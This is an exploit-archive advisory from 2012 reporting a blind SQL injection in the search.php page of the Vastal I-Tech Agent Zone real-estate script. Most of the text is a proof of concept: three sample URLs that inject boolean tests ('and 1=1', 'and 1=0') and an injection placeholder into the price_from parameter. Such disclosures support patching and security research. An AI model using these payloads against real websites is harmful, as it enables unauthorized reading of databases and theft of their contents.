Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability
# Published : 2012-01-31
# Author :
# Previous Title : Sphinix Mobile Web Server 3.1.2.47 Multiple Persistent XSS Vulnerabilities
# Next Title : Flyspray 0.9.9.6 CSRF Vulnerability

Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability


# Date: 31.01.2012

# Author: Cagri Tepebasili

# Software : http://www.vastal.com/agent-zone-real-estate-script.html

# Tested on: Linux Mint 12

#####################################################################################################################

The First Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00

The Second Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00

Injection >>>
http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00

Greetz : MythSEC <<<